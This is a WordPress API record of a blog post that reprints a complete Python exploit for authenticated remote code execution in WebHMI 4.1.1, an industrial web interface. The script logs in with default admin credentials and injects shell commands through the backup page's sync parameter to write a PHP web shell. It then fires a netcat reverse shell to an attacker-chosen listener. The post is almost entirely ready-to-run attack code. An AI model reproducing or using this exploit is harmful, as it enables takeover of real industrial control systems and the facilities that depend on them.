{"id":21028,"date":"2022-02-23T18:59:00","date_gmt":"2022-02-23T15:59:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166117\/webhmi411-exec.txt"},"modified":"2022-02-28T10:52:04","modified_gmt":"2022-02-28T07:22:04","slug":"webhmi-4-1-1-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/webhmi-4-1-1-remote-code-execution\/","title":{"rendered":"WebHMI 4.1.1 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: WebHMI 4.1.1 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 03\/01\/2022
\n# Exploit Author: Antonio Cuomo (arkantolo)
\n# Vendor Homepage: https:\/\/webhmi.com.ua\/en\/
\n# Version: WebHMI 4.1.1.7662
\n# Tested on: WebHMI-4.1.1.7662<\/p>\n

#!\/usr\/bin\/python
\nimport sys
\nimport re
\nimport argparse
\nimport requests
\nimport time
\nimport subprocess<\/p>\n

print(“\\nWebHMI 4.1.1 – Remote Code Execution (Authenticated)”,”\\nExploit Author: Antonio Cuomo (Arkantolo)\\n”)
\nprint(“Level2 account must be enabled !\\n”);<\/p>\n

login = “admin”
\npassword = “admin”<\/p>\n

class Exploit:<\/p>\n

def __init__(self, target_ip, target_port, localhost, localport):
\nself.target_ip = target_ip
\nself.target_port = target_port
\nself.localhost = localhost
\nself.localport = localport<\/p>\n

def exploitation(self):
\nreverse = “””rm+\/tmp\/f%3bmknod+\/tmp\/f+p%3bcat+\/tmp\/f|\/bin\/sh+-i+2>%261|nc+””” + localhost + “””+””” + localport + “””+>\/tmp\/f”””
\npayload = “<?php+system($_GET[‘c’]);+?>”<\/p>\n

headers_login = {
\n‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/96.0.4664.110 Safari\/537.36’,
\n‘Accept’: ‘application\/json, text\/javascript, *\/*; q=0.01’,
\n‘Accept-Language’: ‘en-US,en;q=0.5’,
\n‘Accept-Encoding’: ‘gzip, deflate’,
\n‘Content-Type’: ‘application\/json’,
\n‘X-WH-LOGIN’: login,
\n‘X-WH-PASSWORD’: password,
\n‘X-Requested-With’: ‘XMLHttpRequest’,
\n‘Connection’: ‘close’,
\n‘Content-Length’: ‘0’
\n}<\/p>\n

url = ‘http:\/\/’ + target_ip + ‘:’ + target_port
\nr = requests.Session()<\/p>\n

print(‘[*] Resolving URL…’)
\nr1 = r.get(url)
\ntime.sleep(3)<\/p>\n

print(‘[*] Trying to log in…’)
\nr2 = r.post(url + ‘\/api\/signin’, headers=headers_login, allow_redirects=True)
\ntime.sleep(3)<\/p>\n

print(‘[*] Login redirection…’)
\nlogin_cookies = {
\n‘X-WH-SESSION-ID’:r2.headers[‘X-WH-SESSION-ID’],
\n‘X-WH-CHECK-TRIAL’:’true’,
\n‘il18next’:’en’,
\n}
\nr3 = r.post(url + ‘\/login.php?sid=’ + r2.headers[‘X-WH-SESSION-ID’] + ‘&uid=1’,cookies=login_cookies)
\ntime.sleep(3)<\/p>\n

print(‘[*] Bypassing basedir…’)
\nfor i in range(0, len(payload)):
\n#print(payload[i])
\nrp = r.get(url + ‘\/setup\/backup.php?sync=`echo%20-n%20″‘ + payload[i] + ‘”>>cmd.php`’, cookies=login_cookies)
\ntime.sleep(0.2)<\/p>\n

print(‘[*] Setting up listener…’)
\nlistener = subprocess.Popen([“nc”, “-nlp”, self.localport])
\ntime.sleep(2)<\/p>\n

print(‘[*] Executing payload…’)
\ntime.sleep(1)
\nprint(‘[*] Waiting reverse shell…’)
\nr4 = r.get(url + ‘\/setup\/cmd.php?c=`’ + reverse + ‘`.bak’, cookies=login_cookies)<\/p>\n

if (r4.status_code == 200):
\nprint(‘[*] Got shell!’)
\nwhile True:
\nlistener.wait()
\nelse:
\nprint(‘[-] Something went wrong!’)
\nlistener.terminate()<\/p>\n

def get_args():
\nparser = argparse.ArgumentParser(description=’WebHMI 4.1.1 – Remote Code Execution (Authenticated)’)
\nparser.add_argument(‘-t’, ‘–target’, dest=”url”, required=True, action=’store’, help=’Target IP’)
\nparser.add_argument(‘-p’, ‘–port’, dest=”target_port”, required=True, action=’store’, help=’Target port’)
\nparser.add_argument(‘-L’, ‘–listener-ip’, dest=”localhost”, required=True, action=’store’, help=’Local listening IP’)
\nparser.add_argument(‘-P’, ‘–localport’, dest=”localport”, required=True, action=’store’, help=’Local listening port’)
\nargs = parser.parse_args()
\nreturn args<\/p>\n

args = get_args()
\ntarget_ip = args.url
\ntarget_port = args.target_port
\nlocalhost = args.localhost
\nlocalport = args.localport<\/p>\n

exp = Exploit(target_ip, target_port, localhost, localport)
\nexp.exploitation()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: WebHMI 4.1.1 – Remote Code Execution (RCE) (Authenticated) # Date: 03\/01\/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https:\/\/webhmi.com.ua\/en\/ # Version: WebHMI 4.1.1.7662 # Tested on: WebHMI-4.1.1.7662 #!\/usr\/bin\/python import sys import re import argparse import requests import time import subprocess print(“\\nWebHMI 4.1.1 – Remote Code Execution (Authenticated)”,”\\nExploit Author: Antonio Cuomo …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21028","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21028","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21028"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21028\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21028"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21028"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21028"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}